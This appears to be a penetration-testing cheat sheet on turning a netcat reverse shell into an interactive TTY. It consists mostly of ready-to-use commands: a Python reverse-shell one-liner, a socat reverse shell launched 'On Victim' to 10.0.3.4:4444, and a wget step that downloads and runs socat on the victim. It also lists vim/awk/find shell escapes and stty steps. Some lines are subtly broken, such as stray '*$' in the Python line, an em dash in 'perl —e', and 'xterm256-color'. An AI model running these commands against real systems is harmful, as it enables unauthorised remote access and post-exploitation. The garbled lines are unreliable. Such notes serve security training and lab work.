Upgrading shell
Netcat is a great tool, but it also has its shortcoming -
Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell;
You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts;
Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively);
Features like job control, tab complete and command history with the up-arrow are also missing.
To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.
Different PTY modules
Python pty module
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl —e 'exec "/bin/sh";'
Using socat
On Kali (listen):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If not download in Victim:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Other ways
/bin/sh -i
echo os.system('/bin/bash')
exec "/bin/sh";
Related Shell Escape Sequences
Vi / Vim
:!bash
:set shell=/bin/bash
:shell
awk
awk 'BEGIN {system("/bin/bash")}'
find
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \
Netcat Magic
1.First spawn a PTY shell with python or with bash ,
python -c 'import pty; pty.spawn("/bin/bash")'
2. Background the process with Ctrl-z

3. Examine the current terminal and STTY info so we can force the connected shell to match it:
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
The information needed is the size of the current TTY (“Example: rows 38; columns 116”)
4. With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command:
stty raw -echo
With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed.
5. Next foreground the shell with fg
. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with enter button
6. After the reset
the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above)
$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 38 columns 116

The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :)
Obtaining a full interactive shell with zsh
Current kali terminal come with zsh shell so it's important to learn this method as above will not work with zsh shell
1.Get tty shell with above commands and then background the process with ctrl+z
2. Get the number of rows and columns with
stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
3. To ignore hotkeys in the local shell and return to your reverse shell, enter
stty raw -echo; fg
# Note: For zsh users it is important to enter this in one line!
4. Configure your rows and columns
stty rows <ROWS> cols <COLS>
5. Export term
export TERM=xterm-256color
6. All you need to do now, is reload your shell:
exec /bin/bash
Last updated